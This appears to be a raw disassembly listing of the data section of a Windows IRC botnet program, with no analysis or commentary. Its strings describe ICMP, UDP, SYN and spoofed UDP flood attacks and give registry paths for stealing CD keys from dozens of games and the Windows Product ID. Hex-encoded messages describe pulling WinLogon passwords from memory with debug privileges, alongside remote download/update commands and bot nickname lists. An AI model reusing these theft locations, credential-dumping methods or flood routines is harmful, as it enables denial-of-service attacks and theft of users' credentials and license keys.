db 2
db 3, 2Dh, 20h
aErrorSendingPa db 'error sending packets to %s. %d packets sent, returned %d',0
align 10h
unk_4355C0 db 2Dh ; - ; DATA XREF: seg000:00415EFD�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aDoneWithSFlood db 'done with %s flood to %s. sent %d packets @ %dKB/sec (%dMB).',0
align 4
unk_43560C db 2Dh ; - ; DATA XREF: seg000:00415D41�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidTargetI db 'invalid target ip',0
align 4
unk_43562C db 2Dh ; - ; DATA XREF: seg000:00415D19�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSetsockoptFail db 'setsockopt() failed, returned %d',0
align 4
dword_43565C dd 234032Dh, 706D6369h, 202D0302h, 6B636F73h, 29287465h
; DATA XREF: seg000:00415CD4�o
dd 69616620h, 2C64656Ch, 74657220h, 656E7275h, 64252064h
dd 0
dd 234032Dh, 676E6970h, 202D0302h, 696E6966h, 64656873h
dd 6E657320h, 676E6964h, 6E697020h, 74207367h, 7325206Fh
dd 0
db 2Dh ; -
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aErrorSendingPi db 'error sending pings to %s',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFinishedSendin db '- finished sending packets to %s',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aErrorSending_0 db '- error sending packets to %s',0
align 10h
dword_435730 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: seg000:00416456�o
aDoneWithFloodI db '- Done with flood (%iKB/sec)',0
align 4
unk_43575C db 2Dh ; - ; DATA XREF: sub_4164A9+29D�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aSendErrorD_ db '- Send error: <%d>.',0
align 4
unk_43577C db 2Dh ; - ; DATA XREF: seg000:0041681E�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aDoneWithFloo_0 db '- Done with flood (%iKB/sec).',0
align 4
dword_4357A4 dd 234032Dh, 67726174h, 3023361h ; DATA XREF: seg000:00416ACB�o
aDoneWithFlood_ db '- Done with flood.',0
align 8
unk_4357C8 db 2Dh ; - ; DATA XREF: seg000:00416EF3�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSending_1 db '- Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
unk_435818 db 2Dh ; - ; DATA XREF: seg000:00416E89�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aDoneWithSFlo_0 db '- Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
unk_435868 db 2Dh ; - ; DATA XREF: seg000:00416BE4�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidTarge_0 db '- Invalid target IP.',0
align 4
unk_435888 db 2Dh ; - ; DATA XREF: seg000:00416BC5�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSetsockop db '- Error: setsockopt() failed, returned: <%d>.',0
align 10h
unk_4358C0 db 2Dh ; - ; DATA XREF: seg000:00416B84�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSocketF_0 db '- Error: socket() failed, returned: <%d>.',0
align 4
unk_4358F4 db 2Dh ; - ; DATA XREF: seg000:0041721C�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aDoneWithFloodD db '- Done with flood, %d packets sent.',0
align 4
unk_435928 db 2Dh ; - ; DATA XREF: sub_417272+371�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorSending_2 db '- Error sending packets to %s. eax=SOCKET_ERROR, WSAGetLastError('
db ')=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0
align 8
unk_4359B8 db 2Dh ; - ; DATA XREF: sub_417272+31F�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFinishedSend_0 db '- Finished sending packets to %s. Sent %d packet(s). ~%dMB of dat'
db 'a sent (~%dK/s).',0
align 4
unk_435A1C db 2Dh ; - ; DATA XREF: sub_417272+F5�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aSendingPackets db '- Sending packets to %s...',0
unk_435A48 db 2Dh ; - ; DATA XREF: sub_417272+7C�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aInvalidTarge_1 db '- Invalid target IP. WSAGetLastError() returns %d.',0
align 10h
unk_435A90 db 2Dh ; - ; DATA XREF: sub_417272+5F�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSe db '- Error calling setsockopt(). WSAGetLastError() returns %d.',0
align 10h
unk_435AE0 db 2Dh ; - ; DATA XREF: sub_417272+29�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSo db '- Error calling socket().',0
align 4
unk_435B0C db 2Dh ; - ; DATA XREF: seg000:0041763A�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aStartingWisdom db '- Starting Wisdom spoofed UDP flood thread.',0
align 4
aSD db '%s%d ',0 ; DATA XREF: sub_41776E+1EA�o
align 4
unk_435B54 db 2Dh ; - ; DATA XREF: seg000:00417C25�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aDoneWithFloodP db 'Done with flood, ports hit: %s',0
align 10h
dword_435B80 dd 202E6425h, 73253403h, 203D2003h, 73253703h, 3 ; DATA XREF: sub_417CF8+35�o
dword_435B94 dd 234032Dh, 61696C61h, 696C2073h, 3027473h, 2Dh ; DATA XREF: sub_417CF8+10�o
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_417D70+60�o
align 4
dword_435BCC dd 234032Dh, 3676F6Ch, 43202D02h, 7261656Ch, 2E6465h
; DATA XREF: sub_417E10:loc_417E45�o
dword_435BE0 dd 234032Dh, 2676F6Ch, 63202D03h, 7261656Ch, 6465h, 234032Dh
; DATA XREF: sub_417E10+20�o
dd 2676F6Ch, 6C202D03h, 20747369h, 706D6F63h, 6574656Ch
dd 0
dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 72617473h
dd 676E6974h, 0
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_417F75+12�o
aWindow db 'Window',0 ; DATA XREF: sub_4181B2+23�o
; sub_4183AB+26�o
align 4
aKey3 db 'Key3=',0
align 4
aNeverwinterNig db 'Neverwinter Nights (Hordes of the Underdark)',0
align 4
aKey2 db 'Key2=',0
align 4
aNeverwinterN_0 db 'Neverwinter Nights (Shadows of Undrentide)',0
align 4
aKey1 db 'Key1=',0
align 10h
aNwncdkey_ini db 'nwncdkey.ini',0
align 10h
aNeverwinterN_1 db 'Neverwinter Nights',0
align 4
aLocation db 'Location',0
align 10h
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0
align 4
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0
align 4
aBaseMpSof2key db 'base\mp\sof2key',0
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0
align 10h
aInstallpath db 'InstallPath',0
aSoftwareActivi db 'Software\Activision\Soldier of Fortune II - Double Helix',0
align 4
aHiddenDangerou db 'Hidden & Dangerous 2',0
align 10h
aSoftwareIllusi db 'Software\Illusion Softworks\Hidden & Dangerous 2',0
align 4
aChrome db 'Chrome',0
align 4
aSerialnumber db 'SerialNumber',0
align 4
aSoftwareTechla db 'Software\Techland\Chrome',0
align 4
aNox db 'NOX',0
aSoftwareWestwo db 'Software\Westwood\NOX',0
align 4
aCommandAndConq db 'Command and Conquer: Red Alert 2',0
align 4
aSoftwareWest_0 db 'Software\Westwood\Red Alert 2',0
align 4
aCommandAndCo_0 db 'Command and Conquer: Red Alert',0
align 4
aSoftwareWest_1 db 'Software\Westwood\Red Alert',0
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0
align 4
aSerial db 'Serial',0
align 10h
aSoftwareWest_2 db 'Software\Westwood\Tiberian Sun',0
align 10h
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0
aSoftwareRedSto db 'Software\Red Storm Entertainment\RAVENSHIELD',0
align 4
aNascarRacing20 db 'Nascar Racing 2003',0
align 10h
aSoftwareElectr db 'Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
align 4
aNascarRacing_0 db 'Nascar Racing 2002',0
align 10h
aSoftwareElec_0 db 'Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
align 4
aNhl2003 db 'NHL 2003',0
align 4
aSoftwareElec_1 db 'Software\Electronic Arts\EA Sports\NHL 2003\ergc',0
align 4
aNhl2002 db 'NHL 2002',0
align 4
aSoftwareElec_2 db 'Software\Electronic Arts\EA Sports\NHL 2002\ergc',0
align 4
aFifa2003 db 'FIFA 2003',0
align 4
aSoftwareElec_3 db 'Software\Electronic Arts\EA Sports\FIFA 2003\ergc',0
align 4
aFifa2002 db 'FIFA 2002',0
align 4
aSoftwareElec_4 db 'Software\Electronic Arts\EA Sports\FIFA 2002\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0
align 10h
aSoftwareElec_5 db 'Software\Electronic Arts\EA GAMES\Shogun Total War - Warlord Edit'
db 'ion\ergc',0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0
aSoftwareElec_6 db 'Software\Electronic Arts\EA GAMES\Need For Speed Underground\ergc'
db 0
align 4
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0
align 4
aErgc db 'ergc',0
align 4
aSoftwareElec_7 db 'Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
align 4
aMedalOfHonorAl db 'Medal of Honor: Allied Assault: Spearhead',0
align 10h
aSoftwareElec_8 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault S'
db 'pearhead\ergc',0
align 10h
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
align 10h
aSoftwareElec_9 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault B'
db 'reakthrough\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault',0
align 8
aSoftwareEle_10 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\e'
db 'rgc',0
align 10h
aGlobalOperatio db 'Global Operations',0
align 4
aSoftwareEle_11 db 'Software\Electronic Arts\EA GAMES\Global Operations\ergc',0
align 10h
aCommandAndCo_2 db 'Command and Conquer: Generals',0
align 10h
aSoftwareEle_12 db 'Software\Electronic Arts\EA GAMES\Generals\ergc',0
aJamesBond007Ni db 'James Bond 007: Nightfire',0
align 10h
aSoftwareEle_13 db 'Software\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
aCommandAndCo_3 db 'Command and Conquer: Generals (Zero Hour)',0
align 10h
aSoftwareEle_14 db 'Software\Electronic Arts\EA GAMES\Command and Conquer Generals Ze'
db 'ro Hour\ergc',0
align 10h
aBlackAndWhite db 'Black and White',0
aSoftwareEle_15 db 'Software\Electronic Arts\EA GAMES\Black and White\ergc',0
align 4
aBattlefieldVie db 'Battlefield Vietnam',0
aSoftwareEle_16 db 'Software\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
align 4
aBattlefield194 db 'Battlefield 1942 (Secret Weapons of WWII)',0
align 8
aSoftwareEle_17 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons'
db ' of WWII\ergc',0
align 4
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0
aSoftwareEle_18 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Ro'
db 'me\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942',0
align 4
aSoftwareEle_19 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
aFreedomForce db 'Freedom Force',0
align 10h
aSoftwareEle_20 db 'Software\Electronic Arts\EA Distribution\Freedom Force\ergc',0
aIgi2CovertStri db 'IGI 2: Covert Strike',0
align 4
aSoftwareIgi2Re db 'Software\IGI 2 Retail',0
align 4
aUnrealTourname db 'Unreal Tournament 2004',0
align 4
aSoftwareUnreal db 'Software\Unreal Technology\Installed Apps\UT2004',0
align 4
aUnrealTourna_0 db 'Unreal Tournament 2003',0
align 10h
aSoftwareUnre_0 db 'Software\Unreal Technology\Installed Apps\UT2003',0
align 4
aMicrosoftWindo db 'Microsoft Windows Product ID',0
align 4
aProductid db 'ProductId',0
align 10h
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion',0
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
align 4
aLegendsOfMight db 'Legends of Might and Magic',0
align 10h
aCustomernumber db 'CustomerNumber',0
align 10h
aSoftware3d0Sta db 'Software\3d0\Status',0
aIndustryGiant2 db 'Industry Giant 2',0
align 4
aPrvkey db 'prvkey',0
align 10h
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0
align 4
aHalfLife db 'Half-Life',0
align 10h
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0
align 4
aGunmanChronicl db 'Gunman Chronicles',0
align 4
aKey_0 db 'Key',0
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0
align 4
aTheGladiators db 'The Gladiators',0
align 4
aRegnumber db 'RegNumber',0
align 4
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0
align 10h
aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: seg002:00442AAC�o
aCdkey db 'CDKey',0 ; DATA XREF: seg002:00442AA8�o
align 10h
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: seg002:off_442AA4�o
align 4
asc_436A18: ; DATA XREF: sub_4185EA+E7�o
; sub_4185EA+F2�o
unicode 0, <=>,0
dword_436A1C dd 234032Dh, 656B6463h, 3027379h, 7325202Dh, 7325203Ah
; DATA XREF: sub_4185EA+2B�o
dd 0
dd 234032Dh, 2636364h, 66202D03h, 656C6961h, 6F742064h
dd 6E657320h, 6F742064h, 6D655220h, 2065746Fh, 6D6D6F63h
dd 20646E61h, 6C656873h, 6Ch, 234032Dh, 2636364h, 66202D03h
dd 656C6961h, 6F742064h, 65706F20h, 6572206Eh, 65746F6Dh
dd 6D6F6320h, 646E616Dh, 65687320h, 6C6Ch, 234032Dh, 2636364h
dd 66202D03h, 656C6961h, 6F742064h, 65706F20h, 6F73206Eh
dd 74656B63h, 0
dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h
dd 726F72h, 234032Dh, 2636364h, 66202D03h, 20656C69h, 73207325h
dd 20746E65h, 25206F74h, 25282073h, 79622073h, 29736574h
dd 2Eh, 234032Dh, 2636364h, 75202D03h, 6C62616Eh, 6F742065h
dd 65706F20h, 6F73206Eh, 74656B63h, 0
dd 234032Dh, 2636364h, 73202D03h, 20646E65h, 656D6974h
dd 74756Fh, 43434401h, 4E455320h, 73252044h, 20692520h
dd 25206925h, 169h, 234032Dh, 2636364h, 66202D03h, 20656C69h
dd 73656F64h, 2074276Eh, 73697865h, 74h, 234032Dh, 2636364h
dd 66202D03h, 656C6961h, 6F742064h, 6E696220h, 6F742064h
dd 636F7320h, 74656Bh, 234032Dh, 2636364h, 66202D03h, 656C6961h
dd 6F742064h, 65726320h, 20657461h, 6B636F73h, 7465h, 234032Dh
dd 2636364h, 72202D03h, 69656365h, 20646576h, 66207325h
dd 206D6F72h, 28207325h, 62207325h, 73657479h, 2E29h, 234032Dh
dd 2636364h, 65202D03h, 726F7272h, 65706F20h, 676E696Eh
dd 636F7320h, 74656Bh, 234032Dh, 2636364h, 65202D03h, 726F7272h
dd 65706F20h, 676E696Eh, 6C696620h, 6F662065h, 72772072h
dd 6E697469h, 67h, 622B61h, 234032Dh, 2636364h, 65202D03h
dd 726F7272h, 616E7520h, 20656C62h, 77206F74h, 65746972h
dd 6C696620h, 6F742065h, 73696420h, 6Bh, 234032Dh, 6E776F64h
dd 64616F6Ch, 202D0302h, 20646162h, 206C7275h, 6420726Fh
dd 6520736Eh, 726F7272h, 20746120h, 2E7325h, 234032Dh
dd 6E776F64h, 64616F6Ch, 202D0302h, 61647075h, 66206574h
dd 656C6961h, 65202C64h, 726F7272h, 65786520h, 69747563h
dd 2520676Eh, 73h, 234032Dh, 6E776F64h, 64616F6Ch, 202D0302h
dd 6E776F64h, 64616F6Ch, 25206465h, 4B66312Eh, 6F742042h
dd 20732520h, 2E252040h, 424B6631h, 6365732Fh, 7075202Ch
dd 69746164h, 6220676Eh, 746Fh, 234032Dh, 6E776F64h, 64616F6Ch
dd 202D0302h, 6E65706Fh, 25206465h, 73h, 234032Dh, 6E776F64h
dd 64616F6Ch, 202D0302h, 6E776F64h, 64616F6Ch, 25206465h
dd 2066312Eh, 7420424Bh, 7325206Fh, 25204020h, 2066312Eh
dd 732F424Bh, 6365h, 0
dd 3F500000h, 234032Dh, 6E776F64h, 64616F6Ch, 202D0302h
dd 6E6F7277h, 72632067h, 25282063h, 3D212064h, 29642520h
dd 2Eh, 234032Dh, 6E776F64h, 64616F6Ch, 202D0302h, 6E6F7277h
dd 69662067h, 6973656Ch, 2820657Ah, 21206425h, 6425203Dh
dd 2E29h, 234032Dh, 6E776F64h, 64616F6Ch, 202D0302h, 20746F67h
dd 61647075h, 25206574h, 25282073h, 29424B64h, 2Eh, 234032Dh
dd 6E776F64h, 64616F6Ch, 202D0302h, 6E776F64h, 64616F6Ch
dd 25206465h, 25282073h, 29424B64h, 0
db 2Dh ; -
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aCouldnTOpenF_0 db 'couldn',27h,'t open file: %s',0
align 4
aUnknown db 'Unknown',0 ; DATA XREF: sub_4194B8:loc_4194FB�o
; sub_41B98C+104�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_4194B8:loc_4194F5�o
aDisk db 'Disk',0 ; DATA XREF: sub_4194B8:loc_4194EF�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_4194B8:loc_4194E9�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_4194B8:loc_4194E3�o
align 4
off_436E5C dd offset word_4D4152 ; DATA XREF: sub_4194B8:loc_4194DD�o
dword_436E60 dd 3Fh ; DATA XREF: sub_4194B8+1F�o
aFailed db 'failed',0 ; DATA XREF: sub_419549:loc_419621�o
; sub_419664+24�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_419549+6C�o
align 4
unk_436E74 db 2Dh ; - ; DATA XREF: sub_419664+7D�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSSTotalS db '%s drive (%s): %s total, %s free, %s available',0
align 10h
unk_436EB0 db 2Dh ; - ; DATA XREF: sub_419664+47�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSFailedT db '%s drive (%s): failed to stat, device not ready',0
aA_1 db 'A:\',0 ; DATA XREF: sub_419725:loc_41975B�o
dword_436EF0 dd 234032Dh, 646E6966h, 656C6966h, 202D0302h, 6E756F66h
; DATA XREF: sub_419799+107�o
dd 73252064h, 73255Ch
aS_3 db '%s\*',0 ; DATA XREF: sub_419799+14�o
align 4
db 2Dh ; -
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aFoundDFiles db 'found %d files',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingFor_0 db 'searching for file %s',0
align 4
aMsgina db 'MSGINA',0
align 4
aNwgina db 'NWGINA',0
align 4
aWinlogon db 'WINLOGON',0
align 4
dword_436F78 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h
; DATA XREF: seg000:00419EBF�o
; seg000:00419FAB�o
dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h
dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah
dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 295325h
dword_436FC8 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h
; DATA XREF: seg000:00419FC5�o
dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h
dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah
dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 412F4E28h
dd 2929h, 234032Dh, 646E6966h, 73736170h, 202D0302h, 6C696166h
dd 74206465h, 6E65206Fh, 656C6261h, 62656420h, 70206775h
dd 69766972h, 6567656Ch, 0
dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 62616E75h
dd 7420656Ch, 6966206Fh, 7720646Eh, 6F6C6E69h, 206E6F67h
dd 646970h, 234032Dh, 646E6966h, 73736170h, 202D0302h
dd 62616E75h, 7420656Ch, 6966206Fh, 7420646Eh, 70206568h
dd 77737361h, 2064726Fh, 6D206E69h, 726F6D65h, 79h, 0
dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h
dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h
dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah
dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 206F6E28h
dd 73736170h, 64726F77h, 2E2929h, 530055h, 520045h, 4F0044h
dd 41004Dh, 4E0049h, 0
aUsername:
unicode 0, <USERNAME>,0
align 10h
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0
align 4
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0
align 10h
aNtdll_dll db 'NTDLL.DLL',0
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_41C444+5C�o
; sub_41C444+1E5�o
align 10h
dword_4371F0 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 796C6E6Fh
dd 70757320h, 74726F70h, 6F206465h, 6977206Eh, 2F746E6Eh
dd 326E6977h, 6Bh, 7536h, 7535h, 7C75347Ch, 0
a4you db '{4you}',0 ; DATA XREF: seg002:00443360�o
align 4
a4us db '|4us|',0 ; DATA XREF: seg002:0044335C�o
align 10h
aSex4free db '|sex4free|',0 ; DATA XREF: seg002:00443358�o
align 4
aLoloA db 'lolo|a|',0 ; DATA XREF: seg002:00443354�o
aLol db 'lol',0 ; DATA XREF: seg002:00443350�o
aTot db 'tot',0 ; DATA XREF: seg002:0044334C�o
aMofo db 'mofo',0 ; DATA XREF: seg002:00443348�o
align 4
aMof0 db 'mof0',0 ; DATA XREF: seg002:00443344�o
align 4
aMuha db 'muha',0 ; DATA XREF: seg002:00443340�o
align 4
aYeah db 'yeah',0 ; DATA XREF: seg002:0044333C�o
align 4
aAha db 'aha',0 ; DATA XREF: seg002:00443338�o
aShit db 'shit',0 ; DATA XREF: seg002:00443334�o
align 4
aGurl db 'gurl',0 ; DATA XREF: seg002:00443330�o
align 10h
aGirl db 'GIRL',0 ; DATA XREF: seg002:0044332C�o
align 4
aBoy db 'BOY',0 ; DATA XREF: seg002:00443328�o
aFree db 'Free',0 ; DATA XREF: seg002:00443314�o
align 4
aFuck_0 db 'Fuck',0 ; DATA XREF: seg002:00443310�o
align 4
aSleeping db 'Sleeping',0 ; DATA XREF: seg002:00443304�o
align 4
aF db '^^^f^',0 ; DATA XREF: seg002:004432F8�o
align 10h
aSad db 'Sad',0 ; DATA XREF: seg002:004432F4�o
aLuvu db 'LUVU',0 ; DATA XREF: seg002:004432F0�o
align 4
a___0 db '_|_',0 ; DATA XREF: seg002:004432D4�o
aBbl db '|bbl',0 ; DATA XREF: seg002:004432C8�o
align 4
off_4372D8 dd offset loc_425241+1 ; DATA XREF: seg002:004432C4�o
aMuckc db 'muckc',0 ; DATA XREF: seg002:004432B0�o
align 4
aTruck db 'truck',0 ; DATA XREF: seg002:004432AC�o
align 4
aTrimy db 'trimy',0 ; DATA XREF: seg002:004432A8�o
align 4
aLuvy db 'luvy',0 ; DATA XREF: seg002:004432A4�o
align 4
aUi db 'ui',0 ; DATA XREF: seg002:004432A0�o
align 10h
aSdf db 'sdf',0 ; DATA XREF: seg002:0044329C�o
aRt db 'rt',0 ; DATA XREF: seg002:00443298�o
align 4
aGf db 'gf',0 ; DATA XREF: seg002:00443294�o
align 4
aTy db 'ty',0 ; DATA XREF: seg002:00443290�o
align 10h
aRg db 'rg',0 ; DATA XREF: seg002:0044328C�o
align 4
aHappy db 'happy',0 ; DATA XREF: seg002:00443288�o
align 4
aRs db 'rs',0 ; DATA XREF: seg002:00443268�o
align 10h
aQ8A db '|q8|a',0 ; DATA XREF: seg002:00443220�o
align 4
aQ8 db 'Q8',0 ; DATA XREF: seg002:0044321C�o
align 4
aSick db 'sick}}',0 ; DATA XREF: seg002:00443218�o
align 4
aWiked db '|wiked|',0 ; DATA XREF: seg002:00443214�o
aLuvuF db '||luvu-f|',0 ; DATA XREF: seg002:00443210�o
align 4
aGens db '{gens|',0 ; DATA XREF: seg002:0044320C�o
align 10h
aSex_0 db '{sex}',0 ; DATA XREF: seg002:00443208�o
align 4
aHub db '{hub}',0 ; DATA XREF: seg002:00443204�o
align 10h
aLuck db '|luck|',0 ; DATA XREF: seg002:00443200�o
align 4
aSuck db '|suck|',0 ; DATA XREF: seg002:004431FC�o
align 10h
aTot_0 db '-|tot|',0 ; DATA XREF: seg002:004431F8�o
align 4
aWoh db '|woh|',0 ; DATA XREF: seg002:004431F4�o
align 10h
aTambe db '|tambe|',0 ; DATA XREF: seg002:004431F0�o
aLag db 'lag',0 ; DATA XREF: seg002:004431EC�o
aBad db 'bad',0 ; DATA XREF: seg002:004431E8�o
aTree db 'tree',0 ; DATA XREF: seg002:004431E4�o
align 4
aZex db 'zex',0 ; DATA XREF: seg002:004431E0�o
aLez db 'lez',0 ; DATA XREF: seg002:004431DC�o
aWantedlove db 'WANTEDLOVE',0 ; DATA XREF: seg002:004431D4�o
align 4
aCumhur29 db 'cumhur29',0 ; DATA XREF: seg002:004431D0�o
align 4
aAdamm db 'ADAMM',0 ; DATA XREF: seg002:004431CC�o
align 10h
aMaveRIck db 'MaVe{R}icK',0 ; DATA XREF: seg002:004431C8�o
align 4
aPrometheus db 'prometheus',0 ; DATA XREF: seg002:004431C4�o
align 4
aDallas43m db 'DALLAS43M',0 ; DATA XREF: seg002:004431C0�o
align 4
aTeoman db 'TEOMAN```',0 ; DATA XREF: seg002:004431BC�o
align 10h
aRerpjj db 'RERPJJ',0 ; DATA XREF: seg002:004431B8�o
align 4
aCem39 db 'cem39',0 ; DATA XREF: seg002:004431B4�o
align 10h
aCool30m db 'cool30m',0 ; DATA XREF: seg002:004431B0�o
aTropikal db 'tropikal',0 ; DATA XREF: seg002:004431AC�o
align 4
aPassenger db 'passenger',0 ; DATA XREF: seg002:004431A8�o
align 10h
aNeHaber db 'NE-HABER',0 ; DATA XREF: seg002:004431A4�o
align 4
aUla db 'ula',0 ; DATA XREF: seg002:004431A0�o
aIzmirlm db 'izmirlm',0 ; DATA XREF: seg002:0044319C�o
aAkden db 'akden',0 ; DATA XREF: seg002:00443198�o
align 10h
aKoray db 'KORAY',0 ; DATA XREF: seg002:00443194�o
align 4
aAta29 db 'Ata29',0 ; DATA XREF: seg002:00443190�o
align 10h
aFirtina db 'firtina',0 ; DATA XREF: seg002:0044318C�o
aAdamm33 db 'AdAMM33',0 ; DATA XREF: seg002:00443188�o
aM41ist db 'M41IST',0 ; DATA XREF: seg002:00443184�o
align 4
aMaxsilla db 'maxsilla',0 ; DATA XREF: seg002:00443180�o
align 4
aAdem28 db 'Adem28',0 ; DATA XREF: seg002:0044317C�o
align 4
aAnkm db 'ankM',0 ; DATA XREF: seg002:00443178�o
align 4
aErkan db 'erkan',0 ; DATA XREF: seg002:00443174�o
align 4
aDevre db 'devre',0 ; DATA XREF: seg002:00443170�o
align 4
aYabanc db 'yabanc',0 ; DATA XREF: seg002:0044316C�o
align 4
aBirsen db 'birsen',0 ; DATA XREF: seg002:00443168�o
align 4
aA44m db 'a44m',0 ; DATA XREF: seg002:00443164�o
align 4
aAlcatras db 'alcatras',0 ; DATA XREF: seg002:00443160�o
align 4
